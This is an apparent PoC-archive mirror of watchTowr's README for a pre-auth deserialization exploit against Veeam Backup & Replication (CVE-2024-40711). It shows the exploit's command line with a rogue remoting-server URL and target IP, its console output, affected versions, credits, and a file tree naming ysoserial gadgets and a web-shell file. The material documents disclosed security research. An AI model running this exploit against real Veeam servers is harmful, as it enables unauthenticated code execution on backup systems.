关联漏洞
描述
Pre-Auth Exploit for CVE-2024-40711
介绍
# CVE-2024-40711
Exploit for Veeam backup and Replication Pre-Auth Deserialization CVE-2024-40711
See our [blog post](https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/) for technical details
https://github.com/user-attachments/assets/24e8122c-3e84-408b-87a9-684a9aabeb70
# PoC in Action
```
CVE-2024-40711.exe -f binaryformatter -g Veeam -c http://192.168.201.1:8000/trigger --targetveeam 192.168.201.158
__ .__ ___________
__ _ _______ _/ |_ ____ | |_\__ ___/_____ _ _________
\ \/ \/ /\__ \\ __\/ ___\| | \| | / _ \ \/ \/ /\_ __ \
\ / / __ \| | \ \___| Y \ |( <_> ) / | | \/
\/\_/ (____ /__| \___ >___| /____| \____/ \/\_/ |__|
\/ \/ \/
(*) Veeam Backup & Replication Unauthenticated Remote Code Execution Exploit (CVE-2024-40711)
- Vulnerability Discovered by Florian Hauser (@frycos) at CODE WHITE Gmbh (@codewhitesec)
- Exploit Written by Sina Kheirkhah (@SinSinology) at watchTowr
- Thank you to my dear friend Soroush Dalili (@irsdl) for his help
CVEs: [CVE-2024-40711]
(*) Creating payload for 'cmd /c mspaint.exe'
(*) Wrapping payload in the CDbCryptoKeyInfo custom gadget
(*) Sending Remoting Trigger
(*) Started Rogue Server
HttpServerChannel for 'trigger' created:
http://192.168.201.1:8000/trigger
Press any key to exit ...
[*] Processing message for '/trigger' from 192.168.201.158:50592 ... sending payload!
```
# Florian Hauser
This vulnerability was found by Florian Hauser ([@frycos](https://x.com/frycos)) of CODE WHITE GmbH ([@codewhitesec](https://x.com/codewhitesec)). Make sure to follow his outstanding research, our role was to only recreate and develop the exploit for this issue.
# Affected Versions
| Version | Status |
|--------------------|----------------------------------------------------------------------------------------------|
| 12.2.0.334 | Fully patched. Not affected by the vulnerabilities in this blogpost. |
| 12.1.2.172 | Affected, but exploitation requires authentication. Low privilege users can execute arbitrary code. |
| 12.1.1.56 and earlier | Vulnerable to unauthenticated RCE. |
# Exploit authors
This exploit was written by [Sina Kheirkhah (@SinSinology)](https://x.com/SinSinology) of [watchTowr (@watchtowrcyber)](https://twitter.com/watchtowrcyber)
We'd also like to take the opportunity to thank [Soroush Dalili](https://x.com/irsdl) for his help with this exploit.
# Follow [watchTowr](https://watchTowr.com) Labs
For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team
- https://labs.watchtowr.com/
- https://twitter.com/watchtowrcyber
- https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/
- https://github.com/codewhitesec/RogueRemotingServer
- https://github.com/tyranid/ExploitRemotingService
- https://www.veeam.com/kb4649
文件快照
[4.0K] /data/pocs/2d9e79f3ad2d8de4d7cbf7b367675fcd9aca2354
├── [4.0K] CVE-2024-40711-poc
│ ├── [4.0K] ExploitClass
│ │ ├── [1.7K] ExploitClass.cs
│ │ ├── [4.1K] ExploitClass.csproj
│ │ └── [ 13K] GhostWebShell.cs
│ ├── [1.0K] LICENSE.txt
│ ├── [ 87K] logo.png
│ ├── [ 66K] README.md
│ ├── [4.0K] TestConsoleApp
│ │ ├── [ 178] App.config
│ │ ├── [ 347] Program.cs
│ │ ├── [4.0K] Properties
│ │ │ └── [1.4K] AssemblyInfo.cs
│ │ └── [4.5K] TestConsoleApp_YSONET.csproj
│ ├── [4.0K] ysoserial
│ │ ├── [1.6K] App.config
│ │ ├── [4.0K] dlls
│ │ │ ├── [1.3M] Microsoft.PowerShell.Editor.dll
│ │ │ ├── [6.0M] PresentationFramework.dll
│ │ │ ├── [281K] ReachFramework.dll
│ │ │ ├── [290K] ReachFramework-orig.dll
│ │ │ ├── [5.6M] System.Management.Automation.dll
│ │ │ └── [5.7M] System.Management.Automation-orig.dll
│ │ ├── [4.0K] Generators
│ │ │ ├── [3.7K] ActivitySurrogateDisableTypeCheck.cs
│ │ │ ├── [4.0K] ActivitySurrogateSelectorFromFileGenerator.cs
│ │ │ ├── [ 15K] ActivitySurrogateSelectorGenerator.cs
│ │ │ ├── [5.4K] AxHostStateGenerator.cs
│ │ │ ├── [4.1K] BaseActivationFactoryGenerator.cs
│ │ │ ├── [5.7K] ClaimsIdentityGenerator.cs
│ │ │ ├── [5.8K] ClaimsPrincipalGenerator.cs
│ │ │ ├── [4.1K] DataSetGenerator.cs
│ │ │ ├── [ 10K] DataSetOldBehaviourFromFileGenerator.cs
│ │ │ ├── [8.9K] DataSetOldBehaviourGenerator.cs
│ │ │ ├── [4.2K] DataSetTypeSpoofGenerator.cs
│ │ │ ├── [ 10K] GenericGenerator.cs
│ │ │ ├── [8.1K] GenericPrincipalGenerator.cs
│ │ │ ├── [6.2K] GetterCompilerResultsGenerator.cs
│ │ │ ├── [5.4K] GetterSecurityExceptionGenerator.cs
│ │ │ ├── [ 12K] GetterSettingsPropertyValueGenerator.cs
│ │ │ ├── [2.5K] IGenerator.cs
│ │ │ ├── [ 34K] ObjectDataProviderGenerator.cs
│ │ │ ├── [3.3K] ObjRefGenerator.cs
│ │ │ ├── [7.1K] PSObjectGenerator.cs
│ │ │ ├── [ 25K] ResourceSetGenerator.cs
│ │ │ ├── [6.5K] RolePrincipalGenerator.cs
│ │ │ ├── [ 11K] SessionSecurityTokenGenerator.cs
│ │ │ ├── [8.6K] SessionViewStateHistoryItemGenerator.cs
│ │ │ ├── [ 11K] TextFormattingRunPropertiesGenerator.cs
│ │ │ ├── [7.0K] ToolboxItemContainerGenerator.cs
│ │ │ ├── [ 14K] TypeConfuseDelegateGenerator.cs
│ │ │ ├── [2.9K] TypeConfuseDelegateMonoGenerator.cs
│ │ │ ├── [5.4K] VeeamGenerator.cs
│ │ │ ├── [ 15K] WindowsClaimsIdentityGenerator.cs
│ │ │ ├── [9.3K] WindowsIdentityGenerator.cs
│ │ │ ├── [ 12K] WindowsPrincipalGenerator.cs
│ │ │ ├── [5.4K] XamlAssemblyLoadFromFileGenerator.cs
│ │ │ └── [6.5K] XamlImageInfo.cs
│ │ ├── [4.0K] Helpers
│ │ │ ├── [ 40K] BinaryFormatterMinifier.cs
│ │ │ ├── [3.7K] CommandArgSplitter.cs
│ │ │ ├── [ 301] Debugging.cs
│ │ │ ├── [ 372] FormatterType.cs
│ │ │ ├── [4.0K] GadgetSurrogates
│ │ │ │ ├── [ 602] GetterSettingsPropertyValueSurrogates.cs
│ │ │ │ └── [ 816] ObjectDataProviderSurrogates.cs
│ │ │ ├── [7.4K] InputArgs.cs
│ │ │ ├── [3.0K] JsonHelper.cs
│ │ │ ├── [2.2K] LocalCodeCompiler.cs
│ │ │ ├── [5.2K] MessagePackGetterSettingsPropertyValueHelper.cs
│ │ │ ├── [5.3K] MessagePackObjectDataProviderHelper.cs
│ │ │ ├── [4.0K] ModifiedVulnerableBinaryFormatters
│ │ │ │ ├── [ 13K] AdvancedBinaryFormatterParser.cs
│ │ │ │ ├── [ 93K] binarycommonclasses.cs
│ │ │ │ ├── [ 24K] binaryconverter.cs
│ │ │ │ ├── [5.6K] binaryenums.cs
│ │ │ │ ├── [ 12K] binaryformatter.cs
│ │ │ │ ├── [ 30K] binaryformatterwriter.cs
│ │ │ │ ├── [4.2K] binarymethodmessage.cs
│ │ │ │ ├── [ 40K] binaryobjectinfo.cs
│ │ │ │ ├── [ 69K] binaryobjectreader.cs
│ │ │ │ ├── [ 59K] binaryobjectwriter.cs
│ │ │ │ ├── [ 73K] binaryparser.cs
│ │ │ │ ├── [ 31K] binaryutilclasses.cs
│ │ │ │ ├── [ 759] Environment.cs
│ │ │ │ ├── [ 499] info.txt
│ │ │ │ ├── [5.1K] ObjectExtensions.cs
│ │ │ │ ├── [1.6K] SerTrace.cs
│ │ │ │ ├── [7.1K] SimpleBinaryFormatterParser.cs
│ │ │ │ └── [1.5K] SimpleObjectLosFormatter.cs
│ │ │ ├── [ 38K] SerializersHelper.cs
│ │ │ ├── [ 23K] XmlHelper.cs
│ │ │ └── [ 573] YamlDocumentHelper.cs
│ │ ├── [1.8K] packages.config
│ │ ├── [4.0K] Plugins
│ │ │ ├── [2.5K] ActivatorUrlPlugin.cs
│ │ │ ├── [7.4K] AltserializationPlugin.cs
│ │ │ ├── [4.4K] ApplicationTrustPlugin.cs
│ │ │ ├── [5.5K] ClipboardPlugin.cs
│ │ │ ├── [6.2K] DotNetNukePlugin.cs
│ │ │ ├── [ 11K] GetterCallGadgetsPlugin.cs
│ │ │ ├── [ 254] IPlugin.cs
│ │ │ ├── [ 10K] NetNonRceGadgetsPlugin.cs
│ │ │ ├── [ 14K] ResxPlugin.cs
│ │ │ ├── [5.0K] SessionSecurityTokenHandlerPlugin.cs
│ │ │ ├── [ 19K] SharePointPlugin.cs
│ │ │ ├── [ 21K] ThirdPartyGadgetsPlugin.cs
│ │ │ ├── [4.6K] TransactionManagerReenlist.cs
│ │ │ └── [ 26K] ViewStatePlugin.cs
│ │ ├── [ 36K] Program.cs
│ │ ├── [4.0K] Properties
│ │ │ └── [1.4K] AssemblyInfo.cs
│ │ └── [ 19K] ysoserial.csproj
│ └── [3.9K] ysoserial.sln
├── [1.8M] demo.mp4
├── [4.0K] ExploitRemotingService-master
│ ├── [4.0K] ExampleRemotingService
│ │ ├── [ 158] app.config
│ │ ├── [4.3K] ExampleRemotingService.csproj
│ │ ├── [ 137] packages.config
│ │ ├── [5.6K] Program.cs
│ │ └── [4.0K] Properties
│ │ └── [1.4K] AssemblyInfo.cs
│ ├── [4.0K] ExploitRemotingService
│ │ ├── [ 246] App.config
│ │ ├── [ 952] ChannelUriFixingClientChannelSinkProvider.cs
│ │ ├── [1.4K] ChannelUriFixingServerChannelSinkProvider.cs
│ │ ├── [8.1K] CustomChannel.cs
│ │ ├── [2.1K] DataSetMarshal.cs
│ │ ├── [6.8K] ExploitRemotingService.csproj
│ │ ├── [2.9K] FakeComObjRef.cs
│ │ ├── [5.0K] FakeMessage.cs
│ │ ├── [4.4K] FakeMethod.cs
│ │ ├── [1.6K] FakeType.cs
│ │ ├── [1.8K] MethodCallWrapper.cs
│ │ ├── [ 202] packages.config
│ │ ├── [ 26K] Program.cs
│ │ ├── [4.0K] Properties
│ │ │ └── [1.4K] AssemblyInfo.cs
│ │ ├── [1.2K] SerializableWrapper.cs
│ │ ├── [8.5K] SerializerRemoteClass.cs
│ │ └── [3.1K] TcpMessageWriter.cs
│ ├── [3.1K] ExploitRemotingService.sln
│ ├── [4.0K] Installer
│ │ ├── [4.0K] FakeAsm.csproj
│ │ ├── [2.3K] InstallClass.cs
│ │ ├── [1.2K] IRemoteClass.cs
│ │ ├── [4.0K] Properties
│ │ │ └── [1.1K] AssemblyInfo.cs
│ │ ├── [3.1K] RemoteClass.cs
│ │ └── [1.2K] SerializableRegister.cs
│ ├── [ 34K] LICENSE
│ └── [4.4K] README.md
└── [3.1K] README.md
19 directories, 135 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。